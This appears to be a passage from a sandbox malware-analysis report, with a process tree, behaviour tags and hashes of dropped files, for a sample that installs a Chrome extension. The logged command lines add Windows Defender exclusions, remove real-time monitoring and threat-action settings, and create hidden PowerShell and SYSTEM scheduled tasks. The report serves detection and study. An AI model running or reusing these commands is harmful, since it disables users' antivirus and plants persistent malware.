C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:324⤵PID:1756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:644⤵PID:2840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:324⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:644⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:324⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:644⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:324⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:644⤵PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:324⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:644⤵PID:1032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nbVAllIPPGDxfqVB" /t REG_DWORD /d 0 /reg:324⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nbVAllIPPGDxfqVB" /t REG_DWORD /d 0 /reg:644⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv" /t REG_DWORD /d 0 /reg:324⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv" /t REG_DWORD /d 0 /reg:644⤵PID:2072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:324⤵PID:2596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:644⤵PID:2640
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLMttiOpV" /SC once /ST 15:43:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLMttiOpV"3⤵PID:2052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLMttiOpV"3⤵PID:668
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:852
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2956
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2864
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcuowESrCqkxPIacf" /SC once /ST 03:24:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\zxZiGnQ.exe\" PU /sVBBdidmJ 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcuowESrCqkxPIacf"3⤵PID:2024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 5963⤵
- Loads dropped DLL
- Program crash
PID:2032
-
-
-
C:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\zxZiGnQ.exeC:\Windows\Temp\WVfXyuxDIVBpwENO\JVQnjijFjvVJWlN\zxZiGnQ.exe PU /sVBBdidmJ 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1888
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2240
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:576
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:3064
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:984
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1172
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1424
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2212
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3000
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2040
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1452
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1676
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2896
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2200
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:980
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxFWqzBdxtvvQVHpdf"3⤵PID:836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2840
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:3004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2992
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2512
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HgpwBMHPU\COfvpu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "UrAvajSMMGVpQVJ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UrAvajSMMGVpQVJ2" /F /xml "C:\Program Files (x86)\HgpwBMHPU\TTGrYDp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "UrAvajSMMGVpQVJ"3⤵PID:1452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UrAvajSMMGVpQVJ"3⤵PID:2832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NgFYyJyGBpgGXe" /F /xml "C:\Program Files (x86)\mEGqyDDrClrU2\nfXTtkM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kuVuaOkycoPch2" /F /xml "C:\ProgramData\nbVAllIPPGDxfqVB\SNVzixy.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQDcGaxlNWlbdEUeH2" /F /xml "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR\wTVytBH.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WdAYHlmOsdrxkUAnuZs2" /F /xml "C:\Program Files (x86)\YlnHzqqXEaDDC\jXUHbBl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gADrqfoWgJsmHNhuI" /SC once /ST 09:47:26 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WVfXyuxDIVBpwENO\IYPXFTpf\LzSxqqg.dll\",#1 /AGndidyjag 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gADrqfoWgJsmHNhuI"3⤵PID:1520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcuowESrCqkxPIacf"3⤵PID:2508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 15563⤵
- Loads dropped DLL
- Program crash
PID:1716
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WVfXyuxDIVBpwENO\IYPXFTpf\LzSxqqg.dll",#1 /AGndidyjag 5254032⤵PID:1636
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WVfXyuxDIVBpwENO\IYPXFTpf\LzSxqqg.dll",#1 /AGndidyjag 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gADrqfoWgJsmHNhuI"4⤵PID:844
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F4826A60-F27C-4A14-8876-01538086445C} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]1⤵PID:428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:272 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2528
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:380
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2288
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1456
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55a9b08a00db2c0c74541f9e307a4ce29
SHA1cba80d31ed92fc16aacc170884e436235cd154ff
SHA256a496c6c1bc2b0d49527f534071a0672323a26e6c78ec78ca25501ca6d6f9a2b2
SHA51214af2dd65a355a6269e877072a044b3c6433adae60645d77613fe20566d11690da258270c5e47b9b3c76a1a6b496553deff403b607ed54276c5eb757c845a391
-
Filesize
2KB
MD5b18e2989e6ed25ec0dc6f7729b7121e0
SHA1d67316edda7eefefa0596bb84866f4db1e398026
SHA256a549c4483a563867e449d6ecbdaf7c1d0ae4788abb7946d89d2019e53592adbf
SHA5127a520a33fef712bbccd5f86c0f7b287e80b91c27a5b45d2c34bde1a30ea6df5b2955cf755686cd7a9e6418ec989202891bfaeaa5aa806fdf24af383027a96cb5
-
Filesize
2KB
MD56e1d1c47aa5528e52f9224306c954712
SHA179eb3d08a676437df9d999edaf666c3d58d9ed50
SHA2561b376a5b5a1c7afa33eb1e7cb7abdd10e8e0508063239b5039867b6b045661cd
SHA5120bdd44affb6655419c5474b58d8a7e1f46e3603a2b187421acca7d026d1b07bdbdd41e8d5285757c1c7f898d83bab16fe65807574eb563d7814e842d21fa4a17
-
Filesize
2KB
MD51c9f17a7c6166961a686c5f2030c3bde
SHA1aee083c7a7dddbbe8a63591d9438e75096b40c77
SHA2566f9d9a2bdcc82cb5efe164f0df737064513ee6ff525b6f5cd225ee11e987a7d1
SHA512b5a9cf6cb3067344e724093fa88cbe518461f6000a837b5b7c9b678355b90e86d55de3b2d07b927ed1e1a31745a75323a35032cf4ddb69eeb75c9977c1600b8f
-
Filesize
2.0MB
MD5cf3d9e9bf1459e4071854e0904a710a7
SHA1068978e4df8f91455710f082b6c5b1dd48a87863
SHA256d289f65f72f41c573cf376fe39c1c9678f7e8b76a9d7a6d4493b422f2de317ef
SHA5120d953e162d4527d8984d39a164f081e9c2d4dc153e639880e5cfd2888e520dd6d1d00f5f318896afd34c1a9e4983502f0fb5a0f3b0c1e6884420a53c99cbf161
-
Filesize
2KB
MD5dfcc61a86d1dce32d919d212a71034a9
SHA1a0fbc82f678dcc5c6075f89bd5321a1ca0557a88
SHA256410abbb9eb7cb9596af59095300a08984fa992164e5352041f6b331365ed2a38
SHA5123f0b79e531d1ae1203fe2a9546f2e13fcb3d51943332f74aa201c1d4681784a0993a895cf861c2b09f1e3906621e1cf145bd8e5952111f5e2aeb89a8c506c19c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD59a45da520eb75a30bd704d4f54f67927
SHA1198c44ce7e35503e5f823bbe080c2d1f801863ee
SHA256351195c34ad907c81f34519fb590ae812643800ae93db72c0de81966fd8eee89
SHA512fdfb22a046bcbccd5fbd253c90b4a5c0397e160c2957fa89a43117d89b60f78aa54b4f02f9cf652634d999361b90216d1aa7b48f1b69dd244db1b8214e7eb2e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53a7b6182714927c7af9ed33fe104aa47
SHA118fb1afd88beaecb6b7277da6017dbdd52cacb65
SHA2567e24056ecfedb0de549771cbf01c0708f9ea80e843a49daf7bad415f40b22915
SHA512fd9ad59cd715ab8d87fa452a9f862c6069a4c77658b27edfbb0dc00f69877d3d5605884f184ffe7b8534d30c670a43f54fb2613310d7e1e1d97bf2f7bfb162e8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57f483a6e03bbd1fa970bab20d29fd935
SHA1f8182d88cc4c24d8c064545e0052454d183e84ec
SHA256526e154e965e305c9ee9a04f1a7d1e0854296bf139c619e00c7351791861644c
SHA512d02c29816b2287f4254dd6fee1c6273df66887c33f06d558dda2d447bc3efb86fe38c23928dccd487f9037828843383dbd51d129df50181d43eae31923e829de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5aec8f0e8b09e0d0abdd11dad032f1caf
SHA1a89d298c980c5bc842532641802c5d29101ba0d8
SHA25686222b7e11669e278bf10814b044bca674be1cd35f571f98b4a89886efba6abd
SHA512fca10851b5f47f929e2032420d1d39d41947e04b07a262a530fcae3bd5e39251a9ce7a0dfab50192d4bf50fcf89d45768123fa6330400cf7e0659697cc38dde7
-
Filesize
6KB
MD5aad33f82dadc3c4f7c69db76dd7d7308
SHA1ad143d33384b8cc826656eedd4739a3112d746bd
SHA256c969e1538711c1c5609e050d26abb6a8999083d8ff3bd4b7f3cec86cfaf5c3e0
SHA5121a0657cd06d8a42256e717afda6dde456ad1581082c820f04b8b0e945f544a6c10425ff7ad5bddd9089d2de9eb25517e47eaa4b4673b7ed7fd2a23ac09714d6b
-
Filesize
6.4MB
MD5bf24c20adc8ad4a90cfeffbd2a69de8d
SHA1af8577daa6eaec5d95a212eb84580f8d5ae4e97d
SHA2561bacfb1e05efda2d867f41bc18e810279433991b73e2851e49663c4256983048
SHA512a4545d891ac92576ee25d74d5da1df987de737d8619d02fc6bb4372540b4801f27e255b4ec41afbfe57ab671e9c7ce02b5b3169a9e0d6afc00fbe4c0b3b3cf9f
-
Filesize
9KB
MD5ab0e23ddfb9da40430f0fecfb1448c64
SHA1d050ee87256318ba8757e131923b2d1603409023
SHA25677b427a47e4e24392a6f4ea37a5575e86f275555029f388db2e2660341417bac
SHA51292da2f4a69efb4f6f65a86fcac5502a0c2b14e284b4327f700b5d7265b4e3476b5211712078ebaedd31c5a858138ae9d14de19bd1daf44265e114865e3d18ede
-
Filesize
6KB
MD596373e8c37bfdba9f773548d7369f286
SHA1c8a8be1422732492b7ed48cc4b157443e474b2d3
